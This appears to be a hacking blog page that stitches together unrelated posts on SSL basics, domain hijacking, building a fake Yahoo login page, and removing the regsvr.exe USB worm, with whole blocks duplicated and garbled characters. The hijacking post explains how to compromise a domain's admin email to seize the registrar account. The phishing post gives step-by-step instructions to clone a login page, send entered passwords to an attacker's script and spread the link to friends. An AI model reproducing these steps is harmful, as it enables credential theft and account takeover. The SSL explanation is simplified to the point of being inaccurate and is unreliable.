Secure Sockets Layer (SSL): Complete Tutorial Of SSL
Secure Sockets Layer (SSL): Complete Tutorial Of SSL
Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between a web client and web server. Most of us are familiar with sites such as Gmail and Yahoo using https protocol in their login pages. When we see this, we may wonder about the difference between http and https. Simply put, HTTP protocol is used for standard communication between a web server and client, while HTTPS is used for a SECURE communication.
What exactly is Secure Communication ?
Suppose there exists two communication parties, A (client) and B (server).
The Workings of HTTP
When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This poses a serious security problem; if an intruder (hacker) can gain unauthorized access to the ongoing communication between A and B , he can see the PASSWORDS, as they remain unencrypted. This scenario is illustrated using the following figure
The Workings of HTTPS
When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B’s side. So even if the Hacker gains unauthorized access to the ongoing communication between A and B, he gets only the encrypted password (”xz54p6kd“) and not the original password. This is shown below
How is HTTPS implemented?
HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a website and allows visitors to trust the site with their personal information. It has the following uses:
- An SSL Certificate enables encryption of sensitive information during online transactions.
- Each SSL Certificate contains unique, authenticated information about the certificate owner.
- A Certificate Authority verifies the identity of the certificate owner when it is issued.
How Encryption Works
Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a public key to the browser to perform the encryption. The public key is made available to everyone, but the private key (used for decryption) is kept secret. During a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the private key.
How to identify a secure connection
In Internet Explorer, you will see a lock icon in the Security Status bar. The Security Status bar is located on the right side of the address bar. You can click the lock to view the identity of the website.
In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
So the bottom line is, whenever you perform an online transaction such as credit card payment, bank login, or email login always ensure that you have a secure communication. A secure communication is a must in these situations to avoid phishing.
This post will discuss how domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking.
Domain hijacking is a process by which Internet Domain Names are stolen from their legitimate owners. Domain hijacking is also known as domain theft. In order to learn how to hijack domain names, we must first understand how domain names operate and how they become associated with a particular web server (website).
The integration of domain name is as follows:
Any website consists of two parts. For our example, we will use the website gohacking.com. The domain name (gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of a domain name with the web hosting server is done as follows.
1. After registering a new domain name, we get a control panel that gives us full control of the domain.
2. From this control panel, we point our domain name to the web server where the website’s files are actually hosted.
For a clear understanding, let me take up a small example.
John registers a new domain “abc.com” from X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.
What happens when a domain is hijacked?
Let’s see what happens when a domain name is hijacked. To hijack a domain name you need to get access to the control panel and point the domain name to a different web server. To hijack a domain you do not need to gain access to the target web server.
For example, a hacker gets access to the domain control panel of “abc.com”. From here the hacker re-configures the domain name to point at a different web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).
In this case, John’s domain name (abc.com) is said to be hijacked.
How to hijack a domain name?
To hijack a domain name, you need to gain access to the control panel of the target domain. For this you need the following:
1. The domain registrar name for the target domain.
2. The administrative email address associated with the target domain.
You can get this information by accessing the WHOIS data of the target domain. Go to whois.domaintools.com, enter the target domain name, and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll find the “Administrative contact email address”.
To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company.” Here XYZ Company is the domain registrar. In case if you don’t find this, scroll up and you’ll see ICANN Registrar under the “Registry Data.” In this case, the ICANN registrar is the actual domain registrar.
The administrative email address associated with the domain is the backdoor to hack the domain name. It is the key to unlock the domain control panel. You need to hack this email account and take full control of it. Email hacking has been discussed in my previous post ” HOW TO HACK EMAIL ACCOUNTS.”
Once you take full control of this email account, visit the domain registrar’s website and click forgot password on the login page. You will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once you do this, all the details to reset the password will be sent to the administrative email address. Since you already have access to this email account, you can easily reset the password of the domain control panel. After resetting the password, login to the control panel with your new password and from there you can hijack the domain within minutes.
How to protect the domain name from being hijacked?
The best way to protect the domain name is to protect the administrative email account associated with the domain. If you lose this email account, you loose your domain. So refer to my previous post on how to “PROTECT YOUR EMAIL ACCOUNT FROM BEING HACKED.” Another way to protect your domain is to get private domain registration. When you register a domain name using the private registration option, all your personal details, such as your name, address, phone, and administrative email address, are hidden from the public. When a hacker performs a WHOIS lookup for your domain name, he will not be able to find your name, phone number, or administrative email address. The private registration provides extra security. Private domain registration costs extra, but the advantages are worth it. Every domain registrar provides a private registration option.
In this post, I’ll show you how to create a fake login page. A fake login page exactly resembles the original login page of sites like Yahoo and Gmail. Fake login pages are created for the purpose of stealing passwords.
Here in this post I will provide the procedure for creating a fake login page for Yahoo.com. The same procedure may be followed to create the fake login page of Gmail and other sites.
Due to a large number of requests from my visitors, I have elaborated some of the steps in this post. I have made best effort to explain every point in detail.
Here is a step-by-step procedure to create a fake login page.
STEP 1.
Go to the Yahoo login page by typing the following URL.
Go to the Yahoo login page by typing the following URL.
mail.yahoo.com
STEP 2.
Once the Yahoo login page is loaded, save the page as Complete HTML file. (Not as.mht file)
To save the page go to File->Save As
Once the Yahoo login page is loaded, save the page as Complete HTML file. (Not as.mht file)
To save the page go to File->Save As
Tip: .mht option is available only in IE 7. So if you you are using some other browser you need not worry.
STEP 3.
Once you save the login page completely, you will see a HTML file and a folder – the name is something like Yahoo! Mail The best web-based email!
Once you save the login page completely, you will see a HTML file and a folder – the name is something like Yahoo! Mail The best web-based email!
STEP 4.
Make sure that the folder contains the necessary images and other support files. Now rename the Folder to “files.“ You may also rename the .HTML file to yahoo.HTML
Make sure that the folder contains the necessary images and other support files. Now rename the Folder to “files.“ You may also rename the .HTML file to yahoo.HTML
STEP 5.
Now open the .HTML file using a WordPad. Change the links of all the files present in the folder to /files.
Now open the .HTML file using a WordPad. Change the links of all the files present in the folder to /files.
For example you may find something like this in the opened HTML file
src=”Yahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gif”
Rename the above link into
src=”files/ma_mail_1.gif”
Repeat the same procedure for every file contained in the folder by name “files“.
Tip: To search for the links, press Ctrl+F in the opened WordPad and search for “.gif”. Repeat the Step 5 for every .gif file.
STEP 6.
Now search for the following term
action=
you will see something like this
action=https://login.yahoo.com/config/login?
Edit this to
action=http://yoursite.com/login.php
Tip: Open a free account in 110mb.com to create your own site for uploading the fake login page. yoursite.com has to be substituted with the name of your site. For example if your site name is yahooupdate.110mb.com then replace yoursite.com withyahooupdate.110mb.com.
Save the changes to the file.
NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.
STEP 7.
Now you have to upload your yahoo.HTML, files folder, and login.php to
yoursite.com root folder
NOTE: Make sure that your host supports PHP
Tip: 110mb.com supports PHP
STEP 8.
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)
Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)
Tip: login.php can save the password in any format (not necessarily .TXT format). You can search for a php script in Google that can save the password in any format. You may also search for a php script that can email the username & password.
NOTE: The concept here is to save the password. The format is not important.
STEP 9.
Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends. When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
Distribute the Yahoo.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends. When they login from this fake login page, the login.php will save the username and password onto the .TXT file (or any other format) in your site. Download the file to see the password inside it.
Wondering how to remove new folder exe or regsvr exe or autorun inf virus?
This virus is known popularly as regsvr.exe virus, or as a new folder.exe virus. Most people identify this one by seeing the autorun.inf file on their pen drives.
But recently it was micro identified as WORM_DELF.FKZ. It is spreading mostly using pen drives as the medium.
Manual Process of removal
I prefer removing it manually because it allows me to learn new things in the process.
1.Cut The Supply Line
Search for the autorun.inf file. It is a read only file, so you will have to change it to normal by right-clicking the file, selecting the properties, and un-checking the read only option.
Open the file in notepad, delete everything, and save the file.
Now change the file status back to read only mode so that the virus can not get access again.
2. Click start->run and type “msconfig” and then click ok
Go to the startup tab, look for “regsvr” and uncheck that option. Click OK.
Click on “Exit without Restart” because there are still a few things we need to do before we can restart the PC.
Now go to control panel -> scheduled tasks, and delete the At1 task listed there.
If you are Windows XP Home Edition user, you might not have gpedit.msc. In that case, download and install it from Windows XP Home Edition: gpedit.msc and then follow these steps.
Go to users configuration->Administrative templates->system
Find â€Å“prevent access to registry editing tools†and change the option to disable.
Once you do this, you have registry access back.
This virus is known popularly as regsvr.exe virus, or as a new folder.exe virus. Most people identify this one by seeing the autorun.inf file on their pen drives.
But recently it was micro identified as WORM_DELF.FKZ. It is spreading mostly using pen drives as the medium.
Manual Process of removal
I prefer removing it manually because it allows me to learn new things in the process.
1.Cut The Supply Line
Search for the autorun.inf file. It is a read only file, so you will have to change it to normal by right-clicking the file, selecting the properties, and un-checking the read only option.
Open the file in notepad, delete everything, and save the file.
Now change the file status back to read only mode so that the virus can not get access again.
2. Click start->run and type “msconfig” and then click ok
Go to the startup tab, look for “regsvr” and uncheck that option. Click OK.
Click on “Exit without Restart” because there are still a few things we need to do before we can restart the PC.
Now go to control panel -> scheduled tasks, and delete the At1 task listed there.
If you are Windows XP Home Edition user, you might not have gpedit.msc. In that case, download and install it from Windows XP Home Edition: gpedit.msc and then follow these steps.
Go to users configuration->Administrative templates->system
Find â€Å“prevent access to registry editing tools†and change the option to disable.
Once you do this, you have registry access back.
3.Launch The Attack At The Heart Of The Castle
Click on start->run and type regedit and click ok
Go to edit->find and start the search for regsvr.exe,
4. Delete all occurrences of regsvr.exe; remember to make a backup before deleting. KEEP IN MIND regsvr32.exe is not to be deleted. Delete regsvr.exe occurrences ONLY.
At one or two places, you will find it after explorer.exe. In these cases only delete the regsvr.exe part and not the whole part. E.g. Shell = Exlorer.exe regsvr.exe just delete the regsvr.exe and leave the explorer.exe
5.Seek And Destroy the enemy soldiers; no one should be left behind
 Click on start->search->for files and folders.
 Their click all files and folders
 Type â€Å“*.exe†as filename to search for
 Click on ‘when was it modified ‘ option and select the specify date option
 Type from date as 1/31/2008 and also type to date as 1/31/2008
 Now hit search and wait for all the exe’s to show up.
 Once the search is over, select all the exe files and shift+delete the files, caution must be taken so that you don’t delete the legitimate exe file that you have installed on 31st January.
 Selecting many files together might make your computer unresponsive so delete them in small bunches.
 Also find and delete regsvr.exe, svchost.exe (notice an extra space between the svchost and .exe)
6.Time For Celebrations
Now do a cold reboot (i.e., press the reboot button) and you are finished!
Click on start->run and type regedit and click ok
Go to edit->find and start the search for regsvr.exe,
4. Delete all occurrences of regsvr.exe; remember to make a backup before deleting. KEEP IN MIND regsvr32.exe is not to be deleted. Delete regsvr.exe occurrences ONLY.
At one or two places, you will find it after explorer.exe. In these cases only delete the regsvr.exe part and not the whole part. E.g. Shell = Exlorer.exe regsvr.exe just delete the regsvr.exe and leave the explorer.exe
5.Seek And Destroy the enemy soldiers; no one should be left behind
 Click on start->search->for files and folders.
 Their click all files and folders
 Type â€Å“*.exe†as filename to search for
 Click on ‘when was it modified ‘ option and select the specify date option
 Type from date as 1/31/2008 and also type to date as 1/31/2008
 Now hit search and wait for all the exe’s to show up.
 Once the search is over, select all the exe files and shift+delete the files, caution must be taken so that you don’t delete the legitimate exe file that you have installed on 31st January.
 Selecting many files together might make your computer unresponsive so delete them in small bunches.
 Also find and delete regsvr.exe, svchost.exe (notice an extra space between the svchost and .exe)
6.Time For Celebrations
Now do a cold reboot (i.e., press the reboot button) and you are finished!
About Gamemaker gafoor.2
No comments